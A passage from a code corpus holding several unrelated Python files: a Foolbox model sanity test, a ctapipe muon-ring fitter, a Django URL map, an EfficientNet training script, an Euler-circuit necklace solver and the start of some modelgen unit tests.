x[:] = np.random.randn(*x.shape)
# run the model
logits = model.forward_one(x)
probabilities = foolbox.utils.softmax(logits)
predicted_class = np.argmax(logits)
# sanity check
assert predicted_class >= 0
assert np.sum(probabilities) >= 0.9999
# TODO: delete fmodel
def test_non_default_module_throws_error():
with pytest.raises(RuntimeError):
ModelLoader.get(key="other")
|
15691
|
import numpy as np
from ctapipe.core import Component
from ctapipe.containers import MuonRingContainer
from .fitting import kundu_chaudhuri_circle_fit, taubin_circle_fit
import traitlets as traits
# the fit methods do not expose the same interface, so we
# force the same interface onto them, here.
# we also modify their names slightly, since the names are
# exposed to the user via the string traitlet `fit_method`
def kundu_chaudhuri(x, y, weights, mask):
"""kundu_chaudhuri_circle_fit with x, y, weights, mask interface"""
return kundu_chaudhuri_circle_fit(x[mask], y[mask], weights[mask])
def taubin(x, y, weights, mask):
"""taubin_circle_fit with x, y, weights, mask interface"""
return taubin_circle_fit(x, y, mask)
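# Note: taubin_circle_fit does not use the weights; the `weights` argument is
# accepted above only so that both fit functions share the same call signature.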
FIT_METHOD_BY_NAME = {m.__name__: m for m in [kundu_chaudhuri, taubin]}
__all__ = ["MuonRingFitter"]
class MuonRingFitter(Component):
"""Different ring fit algorithms for muon rings"""
fit_method = traits.CaselessStrEnum(
list(FIT_METHOD_BY_NAME.keys()),
default_value=list(FIT_METHOD_BY_NAME.keys())[0],
).tag(config=True)
def __call__(self, x, y, img, mask):
"""allows any fit to be called in form of
MuonRingFitter(fit_method = "name of the fit")
"""
fit_function = FIT_METHOD_BY_NAME[self.fit_method]
radius, center_x, center_y = fit_function(x, y, img, mask)
return MuonRingContainer(
center_x=center_x,
center_y=center_y,
radius=radius,
center_phi=np.arctan2(center_y, center_x),
center_distance=np.sqrt(center_x ** 2 + center_y ** 2),
)
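# Minimal usage sketch (illustrative only; the input array names are assumptions):
# fitter = MuonRingFitter(fit_method="taubin")
# ring = fitter(pix_x, pix_y, image, clean_mask)
# print(ring.radius, ring.center_x, ring.center_y)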
|
15695
|
from django.conf import settings
from django.conf.urls import *
from django.conf.urls.static import static
from django.contrib import admin
from django.contrib.sitemaps.views import sitemap
from django.views.decorators.cache import cache_page
from django.views.generic import TemplateView
from ajax_select import urls as ajax_select_urls
from .views import (
HomeView, CustomSearchView, autocomplete, ErrorView, BibliographieView,
RssFeed, GlobalSitemap,
)
admin.autodiscover()
urlpatterns = [
url(r'^$', HomeView.as_view(), name='home'),
url(r'^', include('libretto.urls')),
url(r'^examens/', include('examens.urls')),
url(r'^presentation$',
TemplateView.as_view(template_name='pages/presentation.html'),
name='presentation'),
url(r'^contribuer$',
TemplateView.as_view(template_name='pages/contribute.html'),
name='contribuer'),
url(r'^bibliographie$', BibliographieView.as_view(), name='bibliographie'),
url(r'^', include('accounts.urls')),
url(r'^dossiers/', include('dossiers.urls')),
url(r'^admin/lookups/', include(ajax_select_urls)),
url(r'^admin/', admin.site.urls),
url(r'^i18n/', include('django.conf.urls.i18n')),
url(r'^tinymce/', include('tinymce.urls')),
url(r'^grappelli/', include('grappelli.urls')),
url(r'^recherche/', CustomSearchView(), name='haystack_search'),
url(r'^api-auth/', include('rest_framework.urls',
namespace='rest_framework')),
url(r'^autocomplete$', autocomplete, name='autocomplete'),
url(r'^rss\.xml$', RssFeed(), name='rss_feed'),
    url(r'^sitemap\.xml$', cache_page(24*60*60)(sitemap),
{'sitemaps': {'global': GlobalSitemap}},
name='django.contrib.sitemaps.views.sitemap'),
url(r'^404$', ErrorView.as_view(status=404)),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL,
document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
url(r'^403$', ErrorView.as_view(status=403)),
url(r'^500$', ErrorView.as_view(status=500)),
url(r'^503$', ErrorView.as_view(status=503)),
]
|
15715
|
r"""Train an EfficientNet classifier.
Currently implementation of multi-label multi-class classification is
non-functional.
During training, start tensorboard from within the classification/ directory:
tensorboard --logdir run --bind_all --samples_per_plugin scalars=0,images=0
Example usage:
python train_classifier_tf.py run_idfg /ssd/crops_sq \
-m "efficientnet-b0" --pretrained --finetune --label-weighted \
--epochs 50 --batch-size 512 --lr 1e-4 \
--seed 123 \
--logdir run_idfg
"""
from __future__ import annotations
import argparse
from collections import defaultdict
from collections.abc import Callable, Mapping, MutableMapping, Sequence
from datetime import datetime
import json
import os
from typing import Any, Optional
import uuid
import numpy as np
import sklearn.metrics
import tensorflow as tf
from tensorboard.plugins.hparams import api as hp
import tqdm
from classification.train_utils import (
HeapItem, recall_from_confusion_matrix, add_to_heap, fig_to_img,
imgs_with_confidences, load_dataset_csv, prefix_all_keys)
from visualization import plot_utils
AUTOTUNE = tf.data.experimental.AUTOTUNE
# match pytorch EfficientNet model names
EFFICIENTNET_MODELS: Mapping[str, Mapping[str, Any]] = {
'efficientnet-b0': dict(cls='EfficientNetB0', img_size=224, dropout=0.2),
'efficientnet-b1': dict(cls='EfficientNetB1', img_size=240, dropout=0.2),
'efficientnet-b2': dict(cls='EfficientNetB2', img_size=260, dropout=0.3),
'efficientnet-b3': dict(cls='EfficientNetB3', img_size=300, dropout=0.3),
'efficientnet-b4': dict(cls='EfficientNetB4', img_size=380, dropout=0.4),
'efficientnet-b5': dict(cls='EfficientNetB5', img_size=456, dropout=0.4),
'efficientnet-b6': dict(cls='EfficientNetB6', img_size=528, dropout=0.5),
'efficientnet-b7': dict(cls='EfficientNetB7', img_size=600, dropout=0.5)
}
def create_dataset(
img_files: Sequence[str],
labels: Sequence[Any],
sample_weights: Optional[Sequence[float]] = None,
img_base_dir: str = '',
transform: Optional[Callable[[tf.Tensor], Any]] = None,
target_transform: Optional[Callable[[Any], Any]] = None,
cache: bool | str = False
) -> tf.data.Dataset:
"""Create a tf.data.Dataset.
The dataset returns elements (img, label, img_file, sample_weight) if
sample_weights is not None, or (img, label, img_file) if
sample_weights=None.
img: tf.Tensor, shape [H, W, 3], type uint8
label: tf.Tensor
img_file: tf.Tensor, scalar, type str
sample_weight: tf.Tensor, scalar, type float32
Possible TODO: oversample the imbalanced classes
see tf.data.experimental.sample_from_datasets
Args:
img_files: list of str, relative paths from img_base_dir
labels: list of int if multilabel=False
sample_weights: optional list of float
img_base_dir: str, base directory for images
transform: optional transform to apply to a single uint8 JPEG image
target_transform: optional transform to apply to a single label
cache: bool or str, cache images in memory if True, cache images to
a file on disk if a str
Returns: tf.data.Dataset
"""
# images dataset
img_ds = tf.data.Dataset.from_tensor_slices(img_files)
img_ds = img_ds.map(lambda p: tf.io.read_file(img_base_dir + os.sep + p),
num_parallel_calls=AUTOTUNE)
# for smaller disk / memory usage, we cache the raw JPEG bytes instead
# of the decoded Tensor
if isinstance(cache, str):
img_ds = img_ds.cache(cache)
elif cache:
img_ds = img_ds.cache()
# convert JPEG bytes to a 3D uint8 Tensor
# keras EfficientNet already includes normalization from [0, 255] to [0, 1],
# so we don't need to do that here
img_ds = img_ds.map(lambda img: tf.io.decode_jpeg(img, channels=3))
if transform:
img_ds = img_ds.map(transform, num_parallel_calls=AUTOTUNE)
# labels dataset
labels_ds = tf.data.Dataset.from_tensor_slices(labels)
if target_transform:
labels_ds = labels_ds.map(target_transform, num_parallel_calls=AUTOTUNE)
# img_files dataset
img_files_ds = tf.data.Dataset.from_tensor_slices(img_files)
if sample_weights is None:
return tf.data.Dataset.zip((img_ds, labels_ds, img_files_ds))
# weights dataset
weights_ds = tf.data.Dataset.from_tensor_slices(sample_weights)
return tf.data.Dataset.zip((img_ds, labels_ds, img_files_ds, weights_ds))
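# Example call (hypothetical file names, for illustration only):
#   ds = create_dataset(img_files=['a.jpg', 'b.jpg'], labels=[0, 1],
#                       img_base_dir='/data/crops', cache=True)
# Without sample_weights, each element is an (img, label, img_file) tuple.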
def create_dataloaders(
dataset_csv_path: str,
label_index_json_path: str,
splits_json_path: str,
cropped_images_dir: str,
img_size: int,
multilabel: bool,
label_weighted: bool,
weight_by_detection_conf: bool | str,
batch_size: int,
augment_train: bool,
cache_splits: Sequence[str]
) -> tuple[dict[str, tf.data.Dataset], list[str]]:
"""
Args:
dataset_csv_path: str, path to CSV file with columns
['dataset', 'location', 'label'], where label is a comma-delimited
list of labels
splits_json_path: str, path to JSON file
augment_train: bool, whether to shuffle/augment the training set
cache_splits: list of str, splits to cache
training set is cached at /mnt/tempds/random_file_name
validation and test sets are cached in memory
Returns:
datasets: dict, maps split to DataLoader
label_names: list of str, label names in order of label id
"""
df, label_names, split_to_locs = load_dataset_csv(
dataset_csv_path, label_index_json_path, splits_json_path,
multilabel=multilabel, label_weighted=label_weighted,
weight_by_detection_conf=weight_by_detection_conf)
# define the transforms
# efficientnet data preprocessing:
# - train:
# 1) random crop: aspect_ratio_range=(0.75, 1.33), area_range=(0.08, 1.0)
# 2) bicubic resize to img_size
# 3) random horizontal flip
# - test:
# 1) center crop
# 2) bicubic resize to img_size
@tf.function
def train_transform(img: tf.Tensor) -> tf.Tensor:
"""Returns: tf.Tensor, shape [img_size, img_size, C], type float32"""
img = tf.image.resize_with_pad(img, img_size, img_size,
method=tf.image.ResizeMethod.BICUBIC)
img = tf.image.random_flip_left_right(img)
img = tf.image.random_brightness(img, max_delta=0.25)
img = tf.image.random_contrast(img, lower=0.75, upper=1.25)
img = tf.image.random_saturation(img, lower=0.75, upper=1.25)
return img
@tf.function
def test_transform(img: tf.Tensor) -> tf.Tensor:
"""Returns: tf.Tensor, shape [img_size, img_size, C], type float32"""
img = tf.image.resize_with_pad(img, img_size, img_size,
method=tf.image.ResizeMethod.BICUBIC)
return img
dataloaders = {}
for split, locs in split_to_locs.items():
is_train = (split == 'train') and augment_train
split_df = df[df['dataset_location'].isin(locs)]
weights = None
if label_weighted or weight_by_detection_conf:
# weights sums to:
# - if weight_by_detection_conf: (# images in split - conf delta)
# - otherwise: (# images in split)
weights = split_df['weights'].tolist()
if not weight_by_detection_conf:
assert np.isclose(sum(weights), len(split_df))
cache: bool | str = (split in cache_splits)
if split == 'train' and 'train' in cache_splits:
unique_filename = str(uuid.uuid4())
os.makedirs('/mnt/tempds/', exist_ok=True)
cache = f'/mnt/tempds/{unique_filename}'
ds = create_dataset(
img_files=split_df['path'].tolist(),
labels=split_df['label_index'].tolist(),
sample_weights=weights,
img_base_dir=cropped_images_dir,
transform=train_transform if is_train else test_transform,
target_transform=None,
cache=cache)
if is_train:
ds = ds.shuffle(1000, reshuffle_each_iteration=True)
ds = ds.batch(batch_size).prefetch(buffer_size=AUTOTUNE)
dataloaders[split] = ds
return dataloaders, label_names
def build_model(model_name: str, num_classes: int, img_size: int,
pretrained: bool, finetune: bool) -> tf.keras.Model:
"""Creates a model with an EfficientNet base."""
class_name = EFFICIENTNET_MODELS[model_name]['cls']
dropout = EFFICIENTNET_MODELS[model_name]['dropout']
model_class = tf.keras.applications.__dict__[class_name]
weights = 'imagenet' if pretrained else None
inputs = tf.keras.layers.Input(shape=(img_size, img_size, 3))
base_model = model_class(
input_tensor=inputs, weights=weights, include_top=False, pooling='avg')
if finetune:
# freeze the base model's weights, including BatchNorm statistics
# https://www.tensorflow.org/guide/keras/transfer_learning#fine-tuning
base_model.trainable = False
# rebuild output
x = tf.keras.layers.Dropout(dropout, name='top_dropout')(base_model.output)
outputs = tf.keras.layers.Dense(
num_classes,
kernel_initializer=tf.keras.initializers.VarianceScaling(
scale=1. / 3., mode='fan_out', distribution='uniform'),
name='logits')(x)
model = tf.keras.Model(inputs, outputs, name='complete_model')
model.base_model = base_model # cache this so that we can turn off finetune
return model
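# Example (illustrative): an ImageNet-initialized EfficientNet-B0 whose base is
# frozen so that only the new classification head trains at first:
#   model = build_model('efficientnet-b0', num_classes=10, img_size=224,
#                       pretrained=True, finetune=True)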
def main(dataset_dir: str,
cropped_images_dir: str,
multilabel: bool,
model_name: str,
pretrained: bool,
finetune: int,
label_weighted: bool,
weight_by_detection_conf: bool | str,
epochs: int,
batch_size: int,
lr: float,
weight_decay: float,
seed: Optional[int] = None,
logdir: str = '',
cache_splits: Sequence[str] = ()) -> None:
"""Main function."""
# input validation
assert os.path.exists(dataset_dir)
assert os.path.exists(cropped_images_dir)
if isinstance(weight_by_detection_conf, str):
assert os.path.exists(weight_by_detection_conf)
# set seed
seed = np.random.randint(10_000) if seed is None else seed
np.random.seed(seed)
tf.random.set_seed(seed)
# create logdir and save params
params = dict(locals()) # make a copy
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') # '20200722_110816'
logdir = os.path.join(logdir, timestamp)
os.makedirs(logdir, exist_ok=True)
print('Created logdir:', logdir)
with open(os.path.join(logdir, 'params.json'), 'w') as f:
json.dump(params, f, indent=1)
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
img_size = EFFICIENTNET_MODELS[model_name]['img_size']
# create dataloaders and log the index_to_label mapping
loaders, label_names = create_dataloaders(
dataset_csv_path=os.path.join(dataset_dir, 'classification_ds.csv'),
label_index_json_path=os.path.join(dataset_dir, 'label_index.json'),
splits_json_path=os.path.join(dataset_dir, 'splits.json'),
cropped_images_dir=cropped_images_dir,
img_size=img_size,
multilabel=multilabel,
label_weighted=label_weighted,
weight_by_detection_conf=weight_by_detection_conf,
batch_size=batch_size,
augment_train=True,
cache_splits=cache_splits)
writer = tf.summary.create_file_writer(logdir)
writer.set_as_default()
model = build_model(
model_name, num_classes=len(label_names), img_size=img_size,
pretrained=pretrained, finetune=finetune > 0)
# define loss function and optimizer
loss_fn: tf.keras.losses.Loss
if multilabel:
loss_fn = tf.keras.losses.BinaryCrossentropy(
from_logits=True, reduction=tf.keras.losses.Reduction.NONE)
else:
loss_fn = tf.keras.losses.SparseCategoricalCrossentropy(
from_logits=True, reduction=tf.keras.losses.Reduction.NONE)
# using EfficientNet training defaults
# - batch norm momentum: 0.99
# - optimizer: RMSProp, decay 0.9 and momentum 0.9
# - epochs: 350
# - learning rate: 0.256, decays by 0.97 every 2.4 epochs
# - weight decay: 1e-5
lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
lr, decay_steps=1, decay_rate=0.97, staircase=True)
optimizer = tf.keras.optimizers.RMSprop(
learning_rate=lr, rho=0.9, momentum=0.9)
best_epoch_metrics: dict[str, float] = {}
for epoch in range(epochs):
print(f'Epoch: {epoch}')
optimizer.learning_rate = lr_schedule(epoch)
tf.summary.scalar('lr', optimizer.learning_rate, epoch)
if epoch > 0 and finetune == epoch:
print('Turning off fine-tune!')
model.base_model.trainable = True
print('- train:')
# TODO: change weighted to False if oversampling minority classes
train_metrics, train_heaps, train_cm = run_epoch(
model, loader=loaders['train'], weighted=label_weighted,
loss_fn=loss_fn, weight_decay=weight_decay, optimizer=optimizer,
finetune=finetune > epoch, return_extreme_images=True)
train_metrics = prefix_all_keys(train_metrics, prefix='train/')
log_run('train', epoch, writer, label_names,
metrics=train_metrics, heaps=train_heaps, cm=train_cm)
print('- val:')
val_metrics, val_heaps, val_cm = run_epoch(
model, loader=loaders['val'], weighted=label_weighted,
loss_fn=loss_fn, return_extreme_images=True)
val_metrics = prefix_all_keys(val_metrics, prefix='val/')
log_run('val', epoch, writer, label_names,
metrics=val_metrics, heaps=val_heaps, cm=val_cm)
if val_metrics['val/acc_top1'] > best_epoch_metrics.get('val/acc_top1', 0): # pylint: disable=line-too-long
filename = os.path.join(logdir, f'ckpt_{epoch}.h5')
print(f'New best model! Saving checkpoint to {filename}')
model.save(filename)
best_epoch_metrics.update(train_metrics)
best_epoch_metrics.update(val_metrics)
best_epoch_metrics['epoch'] = epoch
print('- test:')
test_metrics, test_heaps, test_cm = run_epoch(
model, loader=loaders['test'], weighted=label_weighted,
loss_fn=loss_fn, return_extreme_images=True)
test_metrics = prefix_all_keys(test_metrics, prefix='test/')
log_run('test', epoch, writer, label_names,
metrics=test_metrics, heaps=test_heaps, cm=test_cm)
# stop training after 8 epochs without improvement
if epoch >= best_epoch_metrics['epoch'] + 8:
break
hparams_dict = {
'model_name': model_name,
'multilabel': multilabel,
'finetune': finetune,
'batch_size': batch_size,
'epochs': epochs
}
hp.hparams(hparams_dict)
writer.close()
def log_run(split: str, epoch: int, writer: tf.summary.SummaryWriter,
label_names: Sequence[str], metrics: MutableMapping[str, float],
heaps: Mapping[str, Mapping[int, list[HeapItem]]], cm: np.ndarray
) -> None:
"""Logs the outputs (metrics, confusion matrix, tp/fp/fn images) from a
single epoch run to Tensorboard.
Args:
metrics: dict, keys already prefixed with {split}/
"""
per_class_recall = recall_from_confusion_matrix(cm, label_names)
metrics.update(prefix_all_keys(per_class_recall, f'{split}/label_recall/'))
# log metrics
for metric, value in metrics.items():
tf.summary.scalar(metric, value, epoch)
# log confusion matrix
cm_fig = plot_utils.plot_confusion_matrix(cm, classes=label_names,
normalize=True)
cm_fig_img = tf.convert_to_tensor(fig_to_img(cm_fig)[np.newaxis, ...])
tf.summary.image(f'confusion_matrix/{split}', cm_fig_img, step=epoch)
# log tp/fp/fn images
for heap_type, heap_dict in heaps.items():
log_images_with_confidence(heap_dict, label_names, epoch=epoch,
tag=f'{split}/{heap_type}')
writer.flush()
def log_images_with_confidence(
heap_dict: Mapping[int, list[HeapItem]],
label_names: Sequence[str],
epoch: int,
tag: str) -> None:
"""
Args:
heap_dict: dict, maps label_id to list of HeapItem, where each HeapItem
data is a list [img, target, top3_conf, top3_preds, img_file],
and img is a tf.Tensor of shape [H, W, 3]
label_names: list of str, label names in order of label id
epoch: int
tag: str
"""
for label_id, heap in heap_dict.items():
label_name = label_names[label_id]
sorted_heap = sorted(heap, reverse=True) # sort largest to smallest
imgs_list = [item.data for item in sorted_heap]
fig, img_files = imgs_with_confidences(imgs_list, label_names)
# tf.summary.image requires input of shape [N, H, W, C]
fig_img = tf.convert_to_tensor(fig_to_img(fig)[np.newaxis, ...])
tf.summary.image(f'{label_name}/{tag}', fig_img, step=epoch)
tf.summary.text(f'{label_name}/{tag}_files', '\n\n'.join(img_files),
step=epoch)
def track_extreme_examples(tp_heaps: dict[int, list[HeapItem]],
fp_heaps: dict[int, list[HeapItem]],
fn_heaps: dict[int, list[HeapItem]],
inputs: tf.Tensor,
labels: tf.Tensor,
img_files: tf.Tensor,
logits: tf.Tensor) -> None:
"""Updates the 5 most extreme true-positive (tp), false-positive (fp), and
false-negative (fn) examples with examples from this batch.
Each HeapItem's data attribute is a tuple with:
- img: np.ndarray, shape [H, W, 3], type uint8
- label: int
- top3_conf: list of float
- top3_preds: list of float
- img_file: str
Args:
*_heaps: dict, maps label_id (int) to heap of HeapItems
inputs: tf.Tensor, shape [batch_size, H, W, 3], type float32
labels: tf.Tensor, shape [batch_size]
img_files: tf.Tensor, shape [batch_size], type tf.string
logits: tf.Tensor, shape [batch_size, num_classes]
"""
labels = labels.numpy().tolist()
inputs = inputs.numpy().astype(np.uint8)
img_files = img_files.numpy().astype(str).tolist()
batch_probs = tf.nn.softmax(logits, axis=1)
iterable = zip(labels, inputs, img_files, batch_probs)
for label, img, img_file, confs in iterable:
label_conf = confs[label].numpy().item()
top3_conf, top3_preds = tf.math.top_k(confs, k=3, sorted=True)
top3_conf = top3_conf.numpy().tolist()
top3_preds = top3_preds.numpy().tolist()
data = (img, label, top3_conf, top3_preds, img_file)
if top3_preds[0] == label: # true positive
item = HeapItem(priority=label_conf - top3_conf[1], data=data)
add_to_heap(tp_heaps[label], item, k=5)
else:
# false positive for top3_pred[0]
# false negative for label
item = HeapItem(priority=top3_conf[0] - label_conf, data=data)
add_to_heap(fp_heaps[top3_preds[0]], item, k=5)
add_to_heap(fn_heaps[label], item, k=5)
def run_epoch(model: tf.keras.Model,
loader: tf.data.Dataset,
weighted: bool,
top: Sequence[int] = (1, 3),
loss_fn: Optional[tf.keras.losses.Loss] = None,
weight_decay: float = 0,
finetune: bool = False,
optimizer: Optional[tf.keras.optimizers.Optimizer] = None,
return_extreme_images: bool = False
) -> tuple[
dict[str, float],
dict[str, dict[int, list[HeapItem]]],
np.ndarray
]:
"""Runs for 1 epoch.
Args:
model: tf.keras.Model
loader: tf.data.Dataset
weighted: bool, whether to use sample weights in calculating loss and
accuracy
top: tuple of int, list of values of k for calculating top-K accuracy
loss_fn: optional loss function, calculates the mean loss over a batch
weight_decay: float, L2-regularization constant
finetune: bool, if true sets model's dropout and BN layers to eval mode
optimizer: optional optimizer
Returns:
metrics: dict, metrics from epoch, contains keys:
'loss': float, mean per-example loss over entire epoch,
only included if loss_fn is not None
'acc_top{k}': float, accuracy@k over the entire epoch
heaps: dict, keys are ['tp', 'fp', 'fn'], values are heap_dicts,
each heap_dict maps label_id (int) to a heap of <= 5 HeapItems with
data attribute (img, target, top3_conf, top3_preds, img_file)
- 'tp': priority is the difference between target confidence and
2nd highest confidence
- 'fp': priority is the difference between highest confidence and
target confidence
- 'fn': same as 'fp'
confusion_matrix: np.ndarray, shape [num_classes, num_classes],
C[i, j] = # of samples with true label i, predicted as label j
"""
# if evaluating or finetuning, set dropout & BN layers to eval mode
is_train = False
train_dropout_and_bn = False
if optimizer is not None:
assert loss_fn is not None
is_train = True
if not finetune:
train_dropout_and_bn = True
reg_vars = [
v for v in model.trainable_variables if 'kernel' in v.name]
if loss_fn is not None:
losses = tf.keras.metrics.Mean()
accuracies_topk = {
k: tf.keras.metrics.SparseTopKCategoricalAccuracy(k) for k in top
}
# for each label, track 5 most-confident and least-confident examples
tp_heaps: dict[int, list[HeapItem]] = defaultdict(list)
fp_heaps: dict[int, list[HeapItem]] = defaultdict(list)
fn_heaps: dict[int, list[HeapItem]] = defaultdict(list)
all_labels = []
all_preds = []
tqdm_loader = tqdm.tqdm(loader)
for batch in tqdm_loader:
if weighted:
inputs, labels, img_files, weights = batch
else:
# even if batch contains sample weights, don't use them
inputs, labels, img_files = batch[0:3]
weights = None
all_labels.append(labels.numpy())
desc = []
with tf.GradientTape(watch_accessed_variables=is_train) as tape:
outputs = model(inputs, training=train_dropout_and_bn)
if loss_fn is not None:
loss = loss_fn(labels, outputs)
if weights is not None:
loss *= weights
# we do not track L2-regularization loss in the loss metric
losses.update_state(loss, sample_weight=weights)
desc.append(f'Loss {losses.result().numpy():.4f}')
if optimizer is not None:
loss = tf.math.reduce_mean(loss)
if not finetune: # only regularize layers before the final FC
                        loss += weight_decay * tf.add_n(
                            [tf.nn.l2_loss(v) for v in reg_vars])
all_preds.append(tf.math.argmax(outputs, axis=1).numpy())
if optimizer is not None:
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
for k, acc in accuracies_topk.items():
acc.update_state(labels, outputs, sample_weight=weights)
desc.append(f'Acc@{k} {acc.result().numpy() * 100:.3f}')
tqdm_loader.set_description(' '.join(desc))
if return_extreme_images:
track_extreme_examples(tp_heaps, fp_heaps, fn_heaps, inputs,
labels, img_files, outputs)
confusion_matrix = sklearn.metrics.confusion_matrix(
y_true=np.concatenate(all_labels), y_pred=np.concatenate(all_preds))
metrics = {}
if loss_fn is not None:
metrics['loss'] = losses.result().numpy().item()
for k, acc in accuracies_topk.items():
metrics[f'acc_top{k}'] = acc.result().numpy().item() * 100
heaps = {'tp': tp_heaps, 'fp': fp_heaps, 'fn': fn_heaps}
return metrics, heaps, confusion_matrix
def _parse_args() -> argparse.Namespace:
"""Parses arguments."""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Trains classifier.')
parser.add_argument(
'dataset_dir',
help='path to directory containing: 1) classification dataset CSV, '
'2) label index JSON, 3) splits JSON')
parser.add_argument(
'cropped_images_dir',
help='path to local directory where image crops are saved')
parser.add_argument(
'--multilabel', action='store_true',
help='for multi-label, multi-class classification')
parser.add_argument(
'-m', '--model-name', default='efficientnet-b0',
choices=list(EFFICIENTNET_MODELS.keys()),
help='which EfficientNet model')
parser.add_argument(
'--pretrained', action='store_true',
help='start with pretrained model')
parser.add_argument(
'--finetune', type=int, default=0,
help='only fine tune the final fully-connected layer for the first '
'<finetune> epochs')
parser.add_argument(
'--label-weighted', action='store_true',
help='weight training samples to balance labels')
parser.add_argument(
'--weight-by-detection-conf', nargs='?', const=True, default=False,
help='weight training examples by detection confidence. '
'Optionally takes a .npz file for isotonic calibration.')
parser.add_argument(
'--epochs', type=int, default=0,
help='number of epochs for training, 0 for eval-only')
parser.add_argument(
'--batch-size', type=int, default=256,
help='batch size for both training and eval')
parser.add_argument(
'--lr', type=float, default=None,
help='initial learning rate, defaults to (0.016 * batch_size / 256)')
parser.add_argument(
'--weight-decay', type=float, default=1e-5,
help='weight decay')
parser.add_argument(
'--seed', type=int,
help='random seed')
parser.add_argument(
'--logdir', default='.',
help='directory where TensorBoard logs and a params file are saved')
parser.add_argument(
'--cache', nargs='*', choices=['train', 'val', 'test'], default=(),
help='which splits of the dataset to cache')
return parser.parse_args()
if __name__ == '__main__':
args = _parse_args()
if args.lr is None:
args.lr = 0.016 * args.batch_size / 256 # based on TF models repo
main(dataset_dir=args.dataset_dir,
cropped_images_dir=args.cropped_images_dir,
multilabel=args.multilabel,
model_name=args.model_name,
pretrained=args.pretrained,
finetune=args.finetune,
label_weighted=args.label_weighted,
weight_by_detection_conf=args.weight_by_detection_conf,
epochs=args.epochs,
batch_size=args.batch_size,
lr=args.lr,
weight_decay=args.weight_decay,
seed=args.seed,
logdir=args.logdir,
cache_splits=args.cache)
|
15718
|
from sys import stdin
from collections import defaultdict, deque
MAX_COLORS = 51
def load_num():
return int(stdin.readline())
def load_pair():
return tuple(map(int, stdin.readline().split()))
def load_case():
nbeads = load_num()
return [load_pair() for b in range(nbeads)]
def build_necklace(beads):
"""Construct an euler circuit in the graph defined by the beads"""
# For a graph to have an euler circuit all vertices must have
# even degree. (Plus 0 or 2 odd vertices) Init and ckeck degree
amatrix = [defaultdict(int) for _ in range(MAX_COLORS)]
degree = defaultdict(int)
for b in beads:
amatrix[b[0]][b[1]] += 1
amatrix[b[1]][b[0]] += 1
degree[b[0]] +=1
degree[b[1]] +=1
for k, v in degree.items():
if v%2 != 0:
return None
# Create necklace using Fleury's algorithm
def get_next_bead(color):
""" """
s_color, s_degree = 0, 0
for col, deg in amatrix[color].items():
if deg > s_degree:
s_color, s_degree = col, deg
if s_degree>0:
amatrix[color][s_color] -= 1
amatrix[s_color][color] -= 1
return (color, s_color)
else:
return None
# Start construction
nxt = get_next_bead(beads[0][1])
necklace = deque([nxt])
while True:
nxt = get_next_bead(necklace[-1][1])
if nxt:
necklace.append(nxt)
elif len(beads) != len(necklace):
            # Closed a cycle before all beads were used: move the last segment to the start
prev = necklace.pop()
necklace.appendleft(prev)
else:
break
return necklace
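# Worked example (illustrative, not judge input): the beads [(1, 2), (2, 3), (3, 1)]
# give every color an even degree, so an Euler circuit exists and build_necklace
# returns a closed walk covering all three beads, e.g. (2, 1), (1, 3), (3, 2).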
if __name__ == '__main__':
ncases = load_num()
for c in range(ncases):
beads = load_case()
necklace = build_necklace(beads)
# Print result
print("Case #{}".format(c+1))
if necklace:
# Print all necklace beads together for faster IO (damn timelimits)
# Almost a third of the time is wasted on IO
necklace_str = ""
for b in necklace:
necklace_str += "{} {}\n".format(b[0], b[1])
else:
necklace_str = "some beads may be lost\n"
if c+1 == ncases:
print(necklace_str[:-1])
else:
print(necklace_str)
|
15766
|
from unittest import TestCase, mock
from modelgen import ModelGenerator, Base
from os import getcwd, path
class TestModelgen(TestCase):
@classmethod
def setUpClass(self):
self.yaml = {'tables': {'userinfo':{'columns':
[{'name': 'firstname', 'type': 'varchar'},
{'name': 'lastname', 'type': 'varchar'},
{'name': 'dob', 'type': 'date'},
{'name': 'contact', 'type': 'numeric'},
{'name': 'address', 'type': 'varchar'}]}}}
self.logger = Base().logger
@mock.patch('modelgen.modelgenerator.Validate')
@mock.patch('modelgen.ModelGenerator.__init__')
@mock.patch('modelgen.modelgenerator.Helper.write_to_file')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.Parser')
@mock.patch('modelgen.modelgenerator.Template')
def test_create_model_wo_alembic(self, mock_templt, mock_prsr, mock_pth,
mock_wrtf, mock_init, mock_validate):
'''
Test create_model function without setting alembic
support to True
'''
mock_init.return_value = None
mock_validate.validate.return_value = True
mock_wrtf.return_value = True
mock_prsr.data.return_value = self.yaml
model_obj = ModelGenerator()
response = model_obj._create_model('test')
self.assertEqual(True, response)
mock_prsr.assert_called_with(filepath=path.join(getcwd(), 'templates/test.yaml'))
mock_wrtf.assert_called_with(path=path.join(getcwd(), 'models/test.py'),
data=mock_templt().render())
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_alembic_meta')
@mock.patch('modelgen.modelgenerator.Validate')
@mock.patch('modelgen.ModelGenerator.__init__')
@mock.patch('modelgen.modelgenerator.Helper.write_to_file')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.Parser')
@mock.patch('modelgen.modelgenerator.Template')
def test_create_model_w_alembic(self, mock_templt, mock_prsr, mock_pth,
mock_wrtf, mock_init, mock_validate, mock_cam):
'''
Test _create_model function with setting alembic
support to True
'''
mock_init.return_value = None
mock_validate.validate.return_value = True
mock_wrtf.return_value = True
mock_prsr.data.return_value = self.yaml
mock_cam.return_value = True
model_obj = ModelGenerator()
response = model_obj._create_model(datasource='./test', alembic=True)
self.assertEqual(True, response)
mock_prsr.assert_called_with(filepath=path.join(getcwd(), 'templates/./test.yaml'))
mock_wrtf.assert_called_with(path=path.join(getcwd(), 'models/./test.py'),
data=mock_templt().render())
@mock.patch('modelgen.modelgenerator.Validate')
@mock.patch('modelgen.ModelGenerator.__init__')
@mock.patch('modelgen.modelgenerator.Helper.write_to_file')
@mock.patch('modelgen.modelgenerator.Path')
